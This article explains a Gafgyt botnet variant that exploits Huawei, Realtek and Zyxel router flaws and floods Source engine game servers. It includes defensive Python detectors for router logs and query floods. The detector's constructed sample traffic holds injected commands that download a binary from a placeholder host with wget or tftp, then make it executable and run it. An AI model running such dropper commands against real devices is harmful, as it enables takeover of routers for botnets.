A collective “revolt” of IoT devices could put people in an awkward position. For example, the film Terminator: Dark Fate depicts an artificial-intelligence defense system called Legion, which has a strong capacity to learn and controls more than 70 percent of the world’s nuclear and humanoid weapons. Before long it concludes, through self-evolution, that eradicating humanity is the only way to end the war. These extreme IoT products go completely mad, and the apocalyptic battle begins.
Although nobody knows whether anything like Legion will ever exist, there are already many botnets that evolve in a similar way, finding ways to take over each host and build their own “rebel legions”.
On October 31st, researchers published a report saying they had detected a new variant of the Gafgyt botnet. The variant targets flaws in some 32,000 small-office and home wireless routers, including Zyxel, Huawei and Realtek models, degrading network connectivity and significantly weakening login security.
Gafgyt botnet “Evolutionary History”
Gafgyt was first discovered in 2014. Since then, it has been known for its large-scale distributed denial-of-service attacks, and many of its variants have started targeting a range of products across industries.
Since 2016, researchers at Zingbox, a cybersecurity firm, have noted that wireless routers are one of the most common IoT devices in all organizations and are the primary target of IoT botnets.
During this time, the Gafgyt botnet has completed several rounds of “evolution”:
In August 2014, Sony’s PlayStation Network (PSN) was completely paralysed by a DDoS attack from the Gafgyt family, for which the hacking group Lizard Squad claimed responsibility.
In December of that year, Lizard Squad again used the family to launch a DDoS attack on Microsoft’s Xbox Live, preventing millions of gamers from connecting to game servers.
In January 2015, the Gafgyt family’s source code was made public. It consists of a single .c file of a little more than 1,600 lines, including the telnet scanning module and the weak-password dictionary.
Since then, underground practitioners have developed a large number of variants (such as Bashlite, Qbot and Tsunami) based on that code, so that attack traces that originally pointed only to Lizard Squad are now obscured.
Botnet attacks can damage the reputation of networks and IP addresses. These botnets exploit vulnerabilities rather than trying to break into connected devices by logging in through an unsecured service. As a result, they can spread across IoT devices more easily, even when enterprise administrators disable insecure services and enforce strong login credentials.
New variant of the Gafgyt family
The newly detected Gafgyt variant is a competitor to the JenX botnet. JenX exploits remote code execution vulnerabilities to gain access to devices and recruit them into its botnet, which it uses to launch distributed denial-of-service (DDoS) attacks on game servers, especially those running the Valve Source engine.
Gafgyt uses three “scanners” that attempt to exploit known remote code execution vulnerabilities in the routers listed above. These scanners replace the typical “dictionary” attacks used by other IoT botnets, which are usually designed to compromise connected devices through insecure services.
The exploit is used as a binary dropper: it fetches the appropriate binary from a malicious server according to the type of device being infected. The new Gafgyt variant can perform different types of DDoS attacks based on commands received from its command and control servers, Zingbox researchers wrote in a blog post.
This new Gafgyt variant targets vulnerabilities in three wireless routers, two of which it shares with JenX: CVE-2017-17215 (in the Huawei HG532) and CVE-2014-8361 (in Realtek’s RTL81XX chipset). CVE-2017-18368 (in the Zyxel P660HN-T1A) is a new addition to Gafgyt.
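The exploit-then-drop pattern described above leaves a recognisable trace in a router’s HTTP access log or in an intrusion-detection feed: a client-controlled parameter that carries shell metacharacters together with a downloader command, and a request for a binary whose name is tagged with the target architecture. The following detector is an added example written for this article; it is not code from Zingbox, from the Gafgyt report, or from any router vendor. It assumes requests have already been parsed into dictionaries (`src`, `method`, `path`, optional `body`), and the architecture-suffix naming convention and the sample traffic are constructed assumptions, not values taken from the report.

```python
import re
from urllib.parse import unquote_plus

# Indicators of an injected shell command that fetches and executes a payload.
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget|busybox)\b", re.I)
SHELL_META_RE = re.compile(r"[;|&`]|\$\(")
EXEC_RE = re.compile(r"\bchmod\s+(\+x|[0-7]{3})\b|(^|[;&|\s])/tmp/\S+", re.I)
# Architecture-tagged payload names. Assumption: the naming convention IoT droppers
# commonly use to pick the right build for the infected device (not from the report).
ARCH_BIN_RE = re.compile(
    r"\.(mips|mipsel|mpsl|arm[4-7]?|armv\dl|x86|i[3-6]86|sh4|ppc|m68k|sparc)\b", re.I)


def split_form(data):
    """Split a query string or form body on '&' only and URL-decode the values.
    We deliberately do not split on ';' (as urllib.parse.parse_qsl may on some
    Python versions), because ';' is exactly the shell separator an injection uses."""
    values = []
    for pair in data.split("&"):
        if pair:
            _, _, raw = pair.partition("=")
            values.append(unquote_plus(raw))
    return values


def extract_values(req):
    """Collect every client-controlled value: query parameters, form fields,
    or the whole body when it is XML/SOAP (UPnP control requests)."""
    _, _, query = req["path"].partition("?")
    values = split_form(query)
    body = req.get("body", "")
    if body.lstrip().startswith("<"):
        values.append(body)
    elif body:
        values.extend(split_form(body))
    return values


def classify_request(req):
    """Return the list of reasons a request looks like an exploit-and-drop attempt."""
    reasons = []
    for value in extract_values(req):
        if SHELL_META_RE.search(value) and (DOWNLOADER_RE.search(value) or EXEC_RE.search(value)):
            reasons.append("command injection with downloader/exec")
            break
    if ARCH_BIN_RE.search(req["path"] + " " + req.get("body", "")):
        reasons.append("architecture-tagged binary name")
    return reasons


def scan_requests(requests):
    """Run the classifier over parsed requests; returns (src, path, reasons) per hit."""
    findings = []
    for req in requests:
        reasons = classify_request(req)
        if reasons:
            findings.append((req["src"], req["path"], reasons))
    return findings


# Constructed sample traffic (not captured data): two benign management requests,
# one benign request that merely contains a ';', and two injection attempts.
SAMPLE_REQUESTS = [
    {"src": "192.168.1.20", "method": "POST", "path": "/login.cgi",
     "body": "user=admin&pw=REDACTED"},
    {"src": "192.168.1.21", "method": "GET", "path": "/firmware/update?file=router_v2.bin"},
    {"src": "192.168.1.22", "method": "GET", "path": "/search?q=a;b"},
    {"src": "203.0.113.44", "method": "GET",
     "path": "/cgi-bin/status.cgi?host=1.1.1.1;wget%20http://192.0.2.5/bins/x.mips"
             "%20-O%20/tmp/x;chmod%20777%20/tmp/x;/tmp/x"},
    {"src": "203.0.113.45", "method": "POST", "path": "/upnp/control/service",
     "body": '<?xml version="1.0"?><s:Envelope><s:Body><u:SetTarget>'
             "<NewTarget>$(/bin/busybox tftp -g -r dropper.arm7 192.0.2.5)</NewTarget>"
             "</u:SetTarget></s:Body></s:Envelope>"},
]

if __name__ == "__main__":
    for src, path, reasons in scan_requests(SAMPLE_REQUESTS):
        print(f"{src} {path[:40]} -> {', '.join(reasons)}")
```

Two findings come back, both from the external addresses, and the request that only contains a semicolon is left alone because a metacharacter on its own is not evidence. Requiring both a metacharacter and a downloader or execution verb keeps the false-positive rate manageable on management interfaces that legitimately accept free text; the architecture-suffix check is a weaker, independent signal that is also useful on egress-proxy logs, where it catches the fetch of the dropped binary even when the original exploit request was never logged.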
Jen Miller-Osborn, deputy director of threat intelligence at Zingbox, said Gafgyt was developed from JenX botnet code, which also highlights hackers’ interest in building botnets in this space.
“This evolution of Gafgyt shows that there is a group of people working to update these botnets, and they will sync the latest vulnerabilities into the botnets and use them to make their lineup strong,” she said.
Game Servers Caught in the Crossfire
The latest Gafgyt variant can perform a DDoS attack payload called Vaf. It can be used against game servers running the Valve Source Engine, taking the game down.
The Valve Source Engine powers games such as Half-Life and Team Fortress 2, which have audiences of millions and would face a flood of user complaints if their servers went down.
Of course, the latest Gafgyt variant is not limited to game servers running the Valve Source Engine. Using other DDoS attack methods, hackers can also target servers hosting other popular games such as Fortnite.
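From the server operator’s side, a Source engine flood is worth detecting separately from generic UDP volume, because the queries are valid protocol traffic the server would otherwise happily answer. The code below is an added example for this article, not code from Zingbox or from the report, and it assumes that the flood consists of Source engine A2S_INFO query packets (the standard `TSource Engine Query` datagram; the report itself does not describe the payload). The packet list is constructed for the demonstration. It flags both a single noisy source and the distributed case, where every bot stays under the per-source limit but the aggregate rate in a window is still far beyond what a real player population would produce.

```python
from collections import defaultdict

# Every Source engine query datagram starts with a 0xFFFFFFFF header; the
# A2S_INFO request is the header followed by this fixed string. Assumption:
# the flood is made of these packets (the report does not detail the payload).
SOURCE_HEADER = b"\xff\xff\xff\xff"
A2S_INFO_QUERY = SOURCE_HEADER + b"TSource Engine Query\x00"


def classify_payload(payload):
    """Return 'A2S_INFO' for an info query, 'OTHER_SOURCE' for another Source
    query, or None for traffic that is not Source protocol at all."""
    if len(payload) < 5 or not payload.startswith(SOURCE_HEADER):
        return None
    return "A2S_INFO" if payload == A2S_INFO_QUERY else "OTHER_SOURCE"


def detect_query_flood(packets, window_s=1.0, per_source_threshold=100, total_threshold=500):
    """packets: iterable of (timestamp_seconds, src_ip, udp_payload).
    Counts A2S_INFO queries per source per time window and returns
    (noisy_sources, flooded_windows): sources exceeding the per-source rate,
    and windows whose aggregate rate exceeds total_threshold even if every
    individual source stayed under the limit (the distributed case)."""
    buckets = defaultdict(lambda: defaultdict(int))  # window -> src -> count
    for ts, src, payload in packets:
        if classify_payload(payload) != "A2S_INFO":
            continue
        buckets[int(ts // window_s)][src] += 1

    noisy_sources = set()
    flooded_windows = []
    for bucket in sorted(buckets):
        per_src = buckets[bucket]
        for src, n in per_src.items():
            if n > per_source_threshold:
                noisy_sources.add(src)
        total = sum(per_src.values())
        if total > total_threshold:
            flooded_windows.append((bucket * window_s, total, len(per_src)))
    return noisy_sources, flooded_windows


def build_sample_traffic():
    """Constructed traffic (not captured data): one legitimate server-browser
    client, some unrelated noise, one single-source flooder, and 60 bots that
    each stay below the per-source limit but together overwhelm one window."""
    packets = [
        (0.0, "198.51.100.7", A2S_INFO_QUERY),
        (0.2, "198.51.100.7", SOURCE_HEADER + b"U\xff\xff\xff\xff"),  # A2S_PLAYER challenge request
        (0.3, "198.51.100.8", b"hello"),                                # unrelated UDP noise
        (5.0, "198.51.100.7", A2S_INFO_QUERY),
    ]
    for i in range(150):  # single flooder: 150 queries inside second 1
        packets.append((1.0 + i * 0.006, "203.0.113.10", A2S_INFO_QUERY))
    for k in range(60):   # distributed: 60 bots x 10 queries inside second 3
        for j in range(10):
            packets.append((3.0 + j * 0.05, f"203.0.113.{100 + k}", A2S_INFO_QUERY))
    return packets


if __name__ == "__main__":
    noisy, flooded = detect_query_flood(build_sample_traffic())
    print("per-source offenders:", sorted(noisy))
    for start, total, sources in flooded:
        print(f"window starting {start:.1f}s: {total} A2S_INFO queries from {sources} sources")
```

On the sample the single flooder is reported as a per-source offender in second 1, while second 3 is reported as a flooded window with 600 queries from 60 sources although no individual bot crossed the limit. The per-source output maps directly onto a host-firewall rate limit for the query port; the aggregate output is the signal to escalate to upstream filtering, since no per-IP rule will help once the load is spread across a botnet.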
With the Gafgyt botnet, hackers can easily disrupt the operation of game servers, but that does not earn them much revenue, says Miller-Osborn, a researcher at Zingbox. Those who do it may therefore be in it only for the pleasure of causing trouble.
“While game servers have become victims, the number of IoT devices targeted by these attacks is increasing. From simply attacking routers to affecting gamers, small and medium-sized businesses and even homes, that’s the scary thing about this Gafgyt variant,” she adds.